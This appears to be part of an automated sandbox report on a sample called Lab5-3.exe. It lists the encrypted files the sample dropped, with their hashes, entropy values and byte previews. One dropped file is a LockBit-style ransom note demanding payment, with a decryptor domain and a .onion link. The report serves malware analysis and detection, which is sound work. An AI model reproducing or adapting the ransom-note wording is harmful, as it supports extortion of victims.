                                                                                                          SHA-256:CDE8440FBFD7D60BF250770E9A1AF088C08277BDFBE0A9506F279B6FC247B27D
                                                                                                          SHA-512:1C8C8727F468501CF24703B8268D2616998B7C16B4ADBFCA758F06822B88F23BE583C8488F064BA44ECC85CDA4A00FE73E0F6642F2DFD09D99EBAC25A4BAEE79
                                                                                                          Malicious:false
                                                                                                          Preview:o..a...s3b.V?....._.........`n.....n..j9.7!.o:G....`.\_B......|.s....t.....U...u..$......r.=.......U..|.0..(.$.aHEV...*..u}]y{H...Y3I6i..3.9;.M.......-..5../...3bK/...RI7.j...Bq.........4....1?..7.[.k.k.:..H..........7..c.....%iT...O<@@E@.xM..3..m.c{..6.......9.Q.+u.i.tmF......R".XW\..h...........".....,.fE....e!....du.}..lF.A.gx...|......~..?...^.mV....../P....9._...Q..p.=.Z...&U...5.PzlH;+;L.XP#f>...T.c@...N.K.o...v2,.m.x.......5..u}...........,k.Y~.K'.x...O..I.. ...n...c0..]......~.!?T`....V.5.lP......'. .lS2...t..X ..b-..JEH..nL.'.e?........(.[-Pq...e....u.MBW.{?dd.;...V.b..X.......T...:..W.].........:......cI..S....!.I.....R..+.=..FF.I.B0..J..XF._"M..~..z...h..._.dZ.I..=v..,j.y...'.U..T.6...?$.....|"..}^..l...>.i.V..V.".'.bX.z.M...;jn%...fe......8+[.`5...5...s.^....@..l.8..c).).As.....xD....=..E....t....-.x.[.....u..`.z._X.)..] ...?@c..I.$.`..J\....a.`....'*...~.....X9....M/.{.2v.a....I.MJ...l..8.X..:..........i*m=.O......M+@X!O..I
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53376
                                                                                                          Entropy (8bit):7.996547433511776
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:TpJ7VaJcG9joR7wx//ScSIBDl3xjK0ZF/Merbva4mzp7LeRElUiZ:lJ7VgcDRuXdBDlBjr/nmvZZ
                                                                                                          MD5:A5DD2C35DC4B1FE0E87F103EDF8B8AA4
                                                                                                          SHA1:4E27107CC685E9EFBFCC0E48F98EEA1CB900F75C
                                                                                                          SHA-256:43B723C2D1DF34E96A94BAA5B1356E1169545C3AAFA59E2D3D082187C53C893B
                                                                                                          SHA-512:36ABB66B466088B27B2E6431D7916DACA6E09449BF30BD1EC96F72997A23400032E433EB70E784738138B80563CB8069B4B35147FA2CF54E43A78F6F0DAA455E
                                                                                                          Malicious:false
                                                                                                          Preview::.....p...xe.T..(~ah.o#.?(.+v.Y......,..c._;..W%D.F......0\..#.K>.:..7&..H..4..X}..9._.....u.......r..V...v....2.....tJ..2..X.*...s/.r..6........~...._(.<....f...8..C..y..(G..........3p.A.7A8..-.......ogG:.~!../...A.@..o.P=|wb...h)1S...C|N?q...I....A\5.md...L.....kV....2..zPN...bPq<.w(.[.T.v[.C....5.u...(... u......[l.w.4..$E.e..7R.U.:...=.C.m.....!J...."$...l.....".#.......4.*..A..x..i^..7(Vi............=....e...:..............).b5{.X..3.1.C..D.9.W.`b......r..j...E..o...0...za..>...N..}h..... .a......'....]"i.5. ;d..H4........3...k.0.Eb....h.f..\.w/.....Uw.=J.2..Cl......%.A..&;..[..^...L<r.k...nw@2m..I.=.[..d>...T.E..:..r.........-.W.X.fq._..p..h...7...B..v..f..v..%..a......;...Y....2....&bo)c.3..h...UNM0&..z..s.X..Md..<.C.|Ul.Sk.....T.D..8sT..!..<u.R.`..}....M.r.|1......D.\... ..6..~..1.W.{.D6....wo..d9.&;.....1.PZ.6..k........Bb..pd..l1/..5.8P.l.a..-|.TX..>.]...0.nvV35.9.l.......-....J.Z.*..(_%.}....%h..sP.#z.%w..2.f..k..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2208
                                                                                                          Entropy (8bit):7.914167899540069
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BEgfNNehnCUjX6giLTOn6vHfUTid3hBaUoSGFcmeykEdEElU92i:BFfNNa3qgc0Gx0uKeY2ElUJ
                                                                                                          MD5:9EA6F26146FEBD1EDE09CCA45ED788A2
                                                                                                          SHA1:55CBF053002022A83A38837D031BA29E0FD00DE6
                                                                                                          SHA-256:F894B23C346344A49DA23A61F01D492EE108DE45AEC2D30DC01692A6DDD08271
                                                                                                          SHA-512:E39D5C7C367CFD9604BA6B7CEAE6AB9E8F3DCF8EB2E545676410D18CAF801A839B090F3449EBD49A7EB01971F7A9760C7169975191D5F889151FCF7CA17FFA2A
                                                                                                          Malicious:false
                                                                                                          Preview:}r.|..0GF..dB....s..s6.y.9.....WK....~..__&...[}.&..k9.,........0sS.@I..6...2T...g.8,..'...4..A=.K..........K......v....]^...._...1l_.G.]..v\Js<..,38..b.U'%..3h%F....wh...7 S:......d+QR.b....$.....9@....1 ..n]...r.Y...^rg&....[...],I!..<..._7)&f'.uL..W..~%..i.-......x..-xrq..F...F.uA)......F.v....q.A"i...e....3]z....K.U....yo....9h..}....9..hl~d.... A...j\....P.......N.lb.;.M,.RaCg'.....J!.[*)..?z.d...,....W.P...C.......W.{.P.q...0.?[7....sSI.kM.S..^)..C._#.3.$....%.3".Ues.I...&4.j.<F..&..B.((D.5....u....~;&.....C...?.].M......[.6.s..W...4\...G;..+...5....J.x......Ns..}....Y..=....._.PnC..qR......=f..-oG.m.5..|..f.....S,e... 5G...n...M.M.4.R.....O....O.ZhZ5.,b....#COv......x...L...`...{%.L@....J@.R..E..i...........T&=..Zt....V...j...4.<..".br.r..HFLp....[#.9..YC......".X5.T..B.P._.:$...Z.P.'.!...X.....n(..:Jd.[.......<v'...4.....&V...6.>.ZD...$...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3616
                                                                                                          Entropy (8bit):7.945616165361702
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:7ouP7CxLYsu6CGn9iYixgA9AVowGx0uKeY2ElUJ:sEwYsu6mtbACD0Cb
                                                                                                          MD5:BA52077A7F11F5B8E74B93F0F5B5E1DE
                                                                                                          SHA1:3CB26EAB29333EDEBB210626C5078351BAC9282B
                                                                                                          SHA-256:FC0BFFBC593978F7AFF6C7F440C38375936C8CD8DCD2196EBCA85B44BD36257A
                                                                                                          SHA-512:B32ECC661C840B4A3A17F01CFD77BACF769E07E787ABA77A7900B069A78E5C4B236188371E781AA811B1F8F0CCA716081D456C2614A89B29F6FEE3FFC4B67F00
                                                                                                          Malicious:false
                                                                                                          Preview:.)y...g4U....\..^.X..)..A.=.3\S..u.sQ.R...@.W.k.wL....p.m.J.#..c....C......Q.p....PK....v...S...../......A#?+..k..O#`...l..4..M......~S.H..:...p...0.:.]@M.....a.Cd.!..'!w...&.W.bj.[.Q...........L\..u.bkM.n..{..Oj.q.EG.W.?..d>.^.X.......(..."U1.K.....xn..&&8.;.W..&.U.<..G..o.8.[.&_.V.<U...X..PB...;...0.O.N.zW.v..8..I.3...?.V..2..#....s..H.JR..;.F.f..I.........q....@+.^nJj...G...o.SO...).k<...:...e..}.",Bj\ID.....@.CZ~.Os.5@..i.@.=.j..3.r3.G...@._.u>....H....d.&V&^J.rHk...|.w..;&.......$.V@..95./.'..-t.plS#..D.~d1.}..R.....s....l.}.F....4.(63.-s.k..Y.{...{f..,\....6n...E.(...1N^.....6I#G.D..o .....qh..$...3.....|....9#e(.dY;.*..'....M.....p.=.1zN.U..Q...*t]E.hfT.....6.K..T..*<...a.L.'..n.#qz...^.2........{8.0.r......r....o.03.x"..9d/.......?..3.....9.Y..a.....6V.........&...e.......V).K....|.......J..b.%.t......y....]..'5*.n..*...L0x..m(Z.M..({#..k08=.......)...{8...H....|A4>n#.....y.ee....1.8].Z.sN4r+.b..F...1...y9...f.?N].....9.$.CF..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6928
                                                                                                          Entropy (8bit):7.973155813528191
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:UXNHi0n1XTNkaXUsWJPs5MfVszIi+um8zSdLObhKAcG6WGdOLRmx5GGx0uKeY2E+:cNT1XTCOUJqMfeIi+um8MLO95Rsf0Cb
                                                                                                          MD5:B41605DAC1EA012843FC4189591C5794
                                                                                                          SHA1:F468DEEF93156DB5869E1D444A5E1C0440667F5D
                                                                                                          SHA-256:84AD02E1D8E78DBD0112B61C9E856B97918EFB00DE43D472D520D2CF642E9DBE
                                                                                                          SHA-512:2645944430D03A4E30CEA4B7AD5E8E1DE609C787E882945E5BEAE4A0836D0202528C611F3ED9602FD55CC73FC780C68A0400E1868893F45A286B9F41EF79BEFA
                                                                                                          Malicious:false
                                                                                                          Preview:....6l#....1.....aE.....Q....a.g..j..5 ....ry.0.{/.|....D.D.....lt.3...v.&. ...s.$.C...s(....>....U.R.-...lR....#....$[[...h.....{....qk.....j......).....=)8f3sG........C\...o.\.;XG..@....I.^v.kT..Vu.q..?&.......^.x..9.)Hesu-.=......1l.Xf.......>.dK..l.k.]u..'.Ef...~)L2yL.|...m.....nz.{n...$.!..j7.....;.b..r6.N....K.....E.`...t.x...j..H^.c8..K.5tmm..~...g...t^..k....&.~..].m..T...9....}.Z..`?>..n...X.F......4..g.D'{..y..b..:..v....vy..rC.....7..1`...KY...[.#/...!.S.....Z...gG.6......F=.lq.E.\.._..-...>..Do...{...........W2..x..OoZ.|.....31`.o.[.E....G..Xs....r.....[J.6..=.Y.57tT.....2......}.O5..8..L.~7.{6N.|f ......T.9@+..._..^`.......ff..._*..$...?.X....^.l./.....S.S.V.PH{.....x...T..H..P.....vW"...fekS.g!...VbQ..F.@...f..fa....9..!.G.p2=.x....GL:..a..z._.....Q..},.:$l...V.t7.sA.P@c6y..)...kd2..Qrr;A.%.J[...Kap.p.:.......T....*..ox....Ss...+wL.@n4j.D..........p.........(.T..:J.7A.u..:..F..J...[.8...5)..9.%N'%.....^...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6048
                                                                                                          Entropy (8bit):7.9714321003845585
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:uz/UDQKR0zp25h+QQuVbU1PmEWiJB0NrKTwyzZTRxbW9Y6oIPD21BHxBzmOclXfL:CwRmp25oQVAPmHiUKTHNlQ96cD2bPm1d
                                                                                                          MD5:98441D3242708AB8EA861D0FC30D20A2
                                                                                                          SHA1:09DBBA6B1AAED4124A8B6ACABFEFE8C90EC60B45
                                                                                                          SHA-256:7AF09932E544FA0BE341DB8E54F3AA3612B4F3EC36C43964FED99F6B9015C4FB
                                                                                                          SHA-512:B102AFBD5DA65FE164A7C36868614345F0DF05C3985E97030A049128B1F7B1EBFA86AC3B6D24A5FF4875E70357BF96F50178579D656CCC221DEFA4FC57ECDB4E
                                                                                                          Malicious:false
                                                                                                          Preview:.R..,.Za..Y...U.d.$Z..`.V./W..Om...p..;v.n.w".@.AlU..R<.....yI....>.M+W.s....-1Wr.p.i.X+.@U..:&.^.~?..k....'ZI...)..;~......j.|\...$.r........c.o..+..#GC..P?U+[..X....$...`a.Tx.../>U...y.-...j....Q......X...*....S.!.....7...e..5Z.D.C.-.....8'....i.......|.e'..m4..>@..h..TX..#Bt.[.G.w.t.`..(e...-........X2xw.[.:.\....7......'.1UA......%T........B.A..mM%.[.4F.I<...N..n..<..).{;.W=....rs..Wq.D.........RZ"...De.G:(dI...3,|.+3...Y...t...a%...*...R..EV$..{7c..Hs..$Xa.{D..Zw..G.21.9.......6.e[.hfb.G.@....e.....N..@.).].Q-..C..&.....m4@E...W{.....I.U.O...Zk}!.y.(.V.U_........9'.9]..b......].I].......6..5....*uZ...5..;N.N..Y......-..T..W.....P...ZCf.7f..c6:.i~=.G..i........].{....`[...k..!W.=K...Df.....W........W...UD........q@=...jr..;.z..V........uo.j....G.K....=.~.\B.$e8..c.(..f.P...E..|)k/#...T......7..d+..r.=......X..f.`.....n*.b.)...k..t..\X....Jui.g...-....~...fJ..1.3..g.*....XW.`vo.{.>..W<.}..d.^A...*..IY.)B.*Y!.\3.......hB._.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3280
                                                                                                          Entropy (8bit):7.94362692064842
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:edoAWkfq6ZVtbEA1nY3rngl5xXoGx0uKeY2ElUJ:MoAWkfTdgA1nUngTJL0Cb
                                                                                                          MD5:36893CD2D9C35D9F7D852C59C3789386
                                                                                                          SHA1:F822AE2216011DB286E1A085E656464985EB757C
                                                                                                          SHA-256:E47976E5A968F18BBA124FCEC0986303DD5D189FD7A9650EC6B7C441BBBC1FB1
                                                                                                          SHA-512:45A397DBD23EFA3F4CDBD539FF37EC1B0B614D8BE3EBB449AE34E9779A3DD8B243CE2FEC53BC500A76D8CB9F875EF70503DBE15E91984D1CC3700F8B545E896B
                                                                                                          Malicious:false
                                                                                                          Preview:.,...k..Z}.0...........MN...,.x.q...e..V..........}/...Q....5.p.(.h^.|..n.L...":.w>.zp....|...CIIg.wd.?.../g......s.....5d.?..tY.a...D...?...+...........Frj......LQ...y.#..|\....}....y.....$f..9....Q..@..io..+X.c.3:Om..'.....C.../. w....Ds..1U.....|......%F..8...}=@P..g.}C.......kqNb..`.....=..-..sr.F..e.B.>..z..G......?.V.fO(O.f_z1....EO..T1....=......c.T..P.s..dtc.j....9E......<..........M.k.9....9.!........r.a...MC..U.*...QJ.a.Rq. _<r....$..C..p.[...[.z&...,~..v.......@...-._...".LP..^... |v.G.(.2..8.v^{ee.......b~.B..Q^.._.[.u....I0.\...].Qc.h...#.H.].{O..<.i..3C....qr..m.V!z`~J+...N=jP.2..f/...3.... .^..N}..L.i.#GL..V.....OQ.<xaL.HVC..N.n.t..?.b...$...H..a.....F.Z...%S...w..,#..<....j.j~.].Nd3h9l~..h-..b..].<.)...\.@..u..Q.%F0..}<\%.W.za...1N.?..y.^.l...Y.n......~+....Dc.EtN..u:..R.l|e.......;..5O.z./;VJ......>>..O..).<.%....t..P...~K.i....m*O..Y..[......D$.=.......U=.w..B;[.....9.Ty.2.K.U..r=O..;n@(.8....l.PC..;..[B....+.*.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2448
                                                                                                          Entropy (8bit):7.9307652509275925
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:rtyp8gjAOLPA9JmQTddnNFzOXcnvHfUTid3hBaUoSGFcmeykEdEElU92i:rmhUfddNFmGx0uKeY2ElUJ
                                                                                                          MD5:6E2EC04852824F15E2B1FD07880A5F28
                                                                                                          SHA1:742D5A1CBC7D8D2F2C1195CE9D0CB798D2D69C4E
                                                                                                          SHA-256:A49E3C02894A0ED2B85EAA088F723A226AFC7A29668BAEF8539008454DF3A201
                                                                                                          SHA-512:02819146BDBE65E3DC490869AA699ADE64E3D39155588ECD990D4436970579C31451111832758ADA2D88E151D05C2F0783470A7143864BAEE7D0300B7F8FF279
                                                                                                          Malicious:false
                                                                                                          Preview:$...Z"y.K..07.Z...$o..C.[...JG......@8...3..M.4..+u,.V5p..n...R..R.....b....6.....yN=h.c....x. ..-....<9..84..G.x.....a...V.lg4....h.LJ.....t....@.jqI....!.k..@...1w.=eC..Ho&rX..k.e.{.Q>C..j..`Ya....d.5.M.....\AI.[a2.[.....$.8n[..r....y..b.X(,...d....-...w..Uj<.K"...eS.NU.r..U....*...x.^..i.@.&..$..J.*....X$..24.Z ...Q..ch..$.L.p.+2..&...y ..Udjc...*..f...p%..j}AV5...4.3..8!..:.#.f......r..].x..c..B.2.....X..l.Q.5....^..E.B...gh..7.t.q.'....*...>..0..k...a.`C....*z..../|1.......U.k.2..?..v~p..D.P............d.k....D.8.gfrz.-.c|..d...~...E.w.i......F.$S;N.;q......\D...0l.J$E.Du?.7...9O..]%.dp..P.]q.kD.xf$..+.m....{d.Y7..!.v.@X..z...b/~./.W....Ve-...gE...8...F...6.L.aK...X.0<...(......%ev...W....K....f..Ps_.g[E"y......@.,X.......F..4.w....pH..>..bo.)dX...:...~(#..S......63..$..(nB|>..M.5.(..s..>.Ac.7.?..88,..{..8.\r..*....3E..5..f...'.%.TX..aX.....[~8.R.....c....~5[.....M...jN8^5}....z.+.y.<.H..k4V.w..L![EF.VM.;.71.Q.....,....... .\i.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3280
                                                                                                          Entropy (8bit):7.944048376069116
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:/nzucSgAfnyTOX3psc7wV6DqqjDTGx0uKeY2ElUJ:/nzUj/Ko9MV6Y0Cb
                                                                                                          MD5:7714ED632E7424D7162A24659736844A
                                                                                                          SHA1:4F9F9EBCF8ECE7224DE3D214141D496A2D6D988F
                                                                                                          SHA-256:9504270A9A832E4DF011E17CF37AFA5F3B71EE2AC614752B9D58D17676CB8F3D
                                                                                                          SHA-512:885BA6BD2744971F0052C96F7006CF903C65ADC0B23A49561A1E9EA71A3D03C3C9C53E76A5EFF23BA94C8E6E9D42761D73852290BC23BACCBE9E8DEDFB8D341D
                                                                                                          Malicious:false
                                                                                                          Preview:...r....T...$..*.....SmJk..>..:i...t..t~.k.Y...|.P./F?n.K..&.M.."....q.n......v..W.........P....../M..<=..Q*...clS...Rz.jS..n.@.yO.X.w...................ql..P)....R._.......(9...T.....v..`...pWu....k."*.1...h..a...?.aP...m...*..B".F.?..0o..*.........a"c...=V~.e.?...^...d....._.J...$..X...."....LT.........:.o..6".%.U].p.....O.f.HS..k...An.]i...efN ..o^.]]F..V.Fi.y.$... ..T.(.M.c|.\.$nW..)..E.CN.%%...@i...+......g.Y.8..}D.......eK.....+>8...s.CVy.z..Z..s....#G........R...).b...}.).c.&|)....+soy.{.-......'W.i.;.Y..N..9.HS..~.SYv........a.d..N....q*U..q.E...92=...9Y.Ko%.$...o..?.M.E..........R...R......^.....PM.....Q.~y_......c.."x/&&.GY.Q....5....W[.&.Td...\...10....T.1v...Z.!.......N?..M1l.j.@.!..U.|..K..h...&.I..i...1..( -...|.L.....w...N....(I..*....`........e.........r....I.3.Y.k...6.q'9.V.&.....]../.mi,.F..G@..l..H......!L...4....bi.s.&.*t...."..dVt=....a}.q..u.#..H..S...n...........|.f...Xz....R@.|..g=PE..m.b?.A..9..H..zk...8....FkV-J..]u
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5152
                                                                                                          Entropy (8bit):7.962670282284412
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:BQCWDcyRKVCyatYy1mUs7k30q4PvuCCqCCWDgeNrGx0uKeY2ElUJ:BDWDtRKDYVswXBCWDgee0Cb
                                                                                                          MD5:66F846ECEA07D9CAE386AA840C5E7E21
                                                                                                          SHA1:A5D887F0BF2956CA1BBFF88BB5FE85004206C62E
                                                                                                          SHA-256:C4C0CC9E730A72A7232981BA98C1E52E04CA410B6D33B43D7F271A1BE143C410
                                                                                                          SHA-512:F2AE24336217BD692A4D929DDCF6CE4B7E7CED1E6FC7E8C9B91621F38812F730D807FAF9D2EEEBD7978274EB5174B52D8FAE6A99B77F33934CCD4D78207EED9B
                                                                                                          Malicious:false
                                                                                                          Preview:........BE#..A.....(oC.G..{...y........{....%...3...!.ty.]..;....4.H.megL.p359.Ws...Xo.W..[.../....i..s...,r7....q.G.hX3.D....v.P.......+J[...4k.lYB6.$.b....<....aH}....9Z.\.J.za...;p..&.k.FOh...... ..K...G.<...w ..9...y..`...#.V.. .Ea...e^..P....3..'z..2O...b$,..Z.[G......'#.T. X!" .l..6.............r...).k.px.a.zT.4.....!fK.m....3^b(.@p...S..{R....&Ii.3tr9n.J..~N:..A...5......-.d!....*.v.td..c..[-GkC..u...J/.U...E.5.s.<.t.x..f`_AD-...g.u......#%@.EXf.."w..kwF....y.6O!C..+.....HJ.?.^..XS.D.]..Yrbd~...^Cy]=..H5..S.G....t.O. ."....D..A....}..i..h..#..M.K...x....... ...h;../.+,...b.K..?y..+.4.....9C..7.5.|.........C.10R.w......:+..F.-...e...c.L......*.s0).~.*.C<.b.v...;...1.......c...7.sc^..T&"S.b..../$.;:C.}.18[..G..<]x.....W.....g..}...v......v.C.L.UI..?m.^d&....at..C.:...}..L...I...h..+..s..N.&s.a...}..~.U.*......).u..]..|"QPV....D..f.Q.dx....s...L.T3X._f..N..jl|.C.Y3v..)b..]........tu........{7..f....V.ge.......N.A..@c.[......8...,
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4048
                                                                                                          Entropy (8bit):7.957787641630505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:QxzXnvnUVfQ8I7nVpkG4eyU2Gx0uKeY2ElUJ:Qxz/o+7nVpkP00Cb
                                                                                                          MD5:DE1B4C4356BBAE25EE1E095F082C9BD3
                                                                                                          SHA1:070BC881965D3B0B6B861EF95123BD73CBFEC7E0
                                                                                                          SHA-256:A93D79C8B663B1FCDED0C2DA30017CF7FC89F29EC4CCE0E236ED0C8F7D8FD423
                                                                                                          SHA-512:C5ED230EB58395F03E3426116EE4B3CBFE82EF3A9812AB3889E1F0B40991639ADCE1C418EF86D4197B52CE968FBB4E40B28570913FFB13E8C6A026CD1CD6EE28
                                                                                                          Malicious:false
                                                                                                          Preview:..SS...T..!."H.....K.......A`.e^O....^..2.`K........G..fHcE..vA...W..+.#. ......K?....i......p.:@._..T#...C.7Y.;Y....../.t....IS..i.!...s...U...Fg...uc3 f....3.V...R.b.y..i.._..x..._._..x^.ZM...A....\..H.....q.Y...M..Ru.E8.v.4ovk....x...I}.rO..>.y..#Y)Yxc81O..k..m8.....YJ..G.2l....?3Xa..;...q...y3E^>...<.|A..0.T...q...u..11.w.a..:..._.Q.#..q;.)._..q~!.R.,..l...!15..]....k.n-f...q_.Qb...X.y.......U...uz2..M!]+.O.........Va.7...;/...zR8..>.*...7.M.........0ulQ.e.....I0..F.n..:.a......e..&I.%\)f.]...,B..P../..'[.:.w4...v5...`.mF..%G..O.n..8.e....0t.......Q.ru....?..I...`...a.....$...@3..<#q.Z..i..0l..:.3.D.........*...wo..T..J@F3K..Kl[.K7..T.`tN..^7I ...%..:N.Dp...*..&V..Z.B.;`....4.......+%...d.....u...D.H......y.([...C...j...V...w...G....Xq.{.g.K...^.G{....s..a9t..;'..r....A.L.d.b..,'..we....V0......+...g.[.....}kXB.1....q[ ...........oY..H....$.i.w....+x..8.&..>.....B.<y;.....L.>.QF...}.vyK.N....AZ...fA..#eGh.Fj.yt...'~,wm4
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):44400
                                                                                                          Entropy (8bit):7.99617720089134
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:P3o8++UXwyNxR6o9JsvgAecE9eUJfgrDc6OpbcJaqu6fzbBhXF2CmJ/GF5w2Z:fo8gwyzRxbsvaN1A++wqukzbTfeG7w2Z
                                                                                                          MD5:34D986BF75B7182AA105233D126318F4
                                                                                                          SHA1:554349D6F7CBD8ED2A24B973A0A535E3D7C5EECF
                                                                                                          SHA-256:4510572496C61D68143ACA47452320F2F31FEC515DB1BC0D80DDB325059A0116
                                                                                                          SHA-512:9564478E438EE9A8F4D27662D64596042EF18A27770F60B5D9C1FA868EA37601018AFE5CB17449BAB0B03C8A18788BDB10B32A095FE796D82C2DA60D1A7C5DEB
                                                                                                          Malicious:false
                                                                                                          Preview:.4...B^'%j....fH..(...,pBr...$..b.. .R..v.8..~....{.5X..Z..d.3.Ea..3..Q......dc~\)..I.^r.W..u.V~.sN..,....#.....w.....M'`.t.g..nW..z...>...m5w..w..0QSAp.%.!..&../mu.R].;....q.z.[.K.............:..[.l.<....n...&......d....+..Y.x[...h..IcC>/y.MJ .8.}.\......`./M..+B...h..(Z..1.6{%........%.6....z..a>...g.oP......) .r.a.S........$2W...X.5.D......h..2m.........|8...<...8..X.s..^9.1!.G.m....Q..9i.......?.....#).bd..h.E@..6..9..M.....r...(.X..2...+..m.E .o..(.'..."X`.Q-5q.:d.K.u...2{.......4.|V&.@....c.e.y.2...}!T.0...Tu...P.T......P.q(0...... ..H......B.."...+<..".q.Lm1.pd..'$#(l3.X....6.u.Hc.x}okzz.N;.KC..i...'O..A.57/.".....x.54K.F...$.z...4....ZE.r...0.o..5..>.h.B...Y.....>.pb]r.........d..O.7.c.....L.dF]....2S.... ....:e..8..l.j`O....._.m.(&c..n\..b.-h....|...J`....[..8...co.%..w..v.......b@r.....:..G.f...4}.>...$...v..f.k..Wj./.f...........#&|d*..a.2Sj.q..|.m..:.eo....Z.:...L..[.D.w"..U[Q....bO9....~L.h..-jZPu.6......vm..+..#.f.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):45968
                                                                                                          Entropy (8bit):7.996013181911549
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:6P98owbG8HxXccBMr37emvZCQD0urCEHbqbMRMcT2oyG3LfIL+5oT4PkhszdvqJL:89Vw6qXcck3qmxCGjPH+bMu+tLfIK5ob
                                                                                                          MD5:C6339F2EEC2B7253CE7350F55BE1B5EB
                                                                                                          SHA1:FF791BECCE7E6CB58313B99DF590568D7334FB70
                                                                                                          SHA-256:00647443E48B5D7E538202CFDB9C1FF1E6DB306B91FC461EFA4918D1BF20A6DA
                                                                                                          SHA-512:CADCD51E4D1A0D76CD51FFAFB7E6E4AE5901FF21148605071B9F2A0E6464DF5DA2469E6EFD81D103FA7CA4337FBA3197EAEA732F571B16506D3C46C148FFFB68
                                                                                                          Malicious:false
                                                                                                          Preview:.....c.HZ.lkFM..6I<^...4..V...R@;.^.....=#...A.....}1.Di..F....x1Y......B....l1.PF..r.m....V'.$..,.`.fF1$.S.mx....W..).*.j...Y.?.)...).:)j..\.we.$..<.A1......K..)x..`.j...Zu.; ..6,}.B.+<.u....6....A..x8....:\6-!.,..Ev>..u89...fK..&.-..[?\.dX86*.....{.:..\..V_..O.C.o..zv|.L.)_?.W...6.o...K&~.A..8%C$K.&..I&A..9....q..4q......@_h.6.k{..3..T...j.G....E[.%8..xHU*...7Q..;...`.NT...g...]<....(.`v..@.`...]........e.3b...3..y.2X.vB..s`7=..+y..K.......){.0.( .E.|?..W.s..)k...b..Bq..X.S.#.B]....{./.|.....i.=...>..,R_..c.m+..Q.Z[.....-e..."....b.lO...6/..Qv.".A.....h..d......%..&Tr...W.\.%H....i.R...f.......fE........]..T..p.......E.h...@.}.+...2'.Xi3...&...,.lO.Y.........!....n.y.....AQC_.>.._.n.....CV......Y.w..+..3.'..A.l.......P.....`d.Q....H@n...!....V."l.-f<.]..T..|.....!..(./.u.v..^.q..+.,...T..M..oO..{..E..j.......}..22.....}.R..0....v ....Fcf....|@.e.N...mCP...~..uo....;..Jo.....C9..%..F....Q.?..eC.R..._.B....(a.#^.[....e.........P8o,..$..s.-.x.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11872
                                                                                                          Entropy (8bit):7.987065601322718
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:98t1QKUrcDkJgJrA7oKUaIiTG2/jZtlagF4fuCVE8qXo9TAnha7q88jm0Cb:98t1DKQVrA78aIiKSLV/8yuAhaX8itb
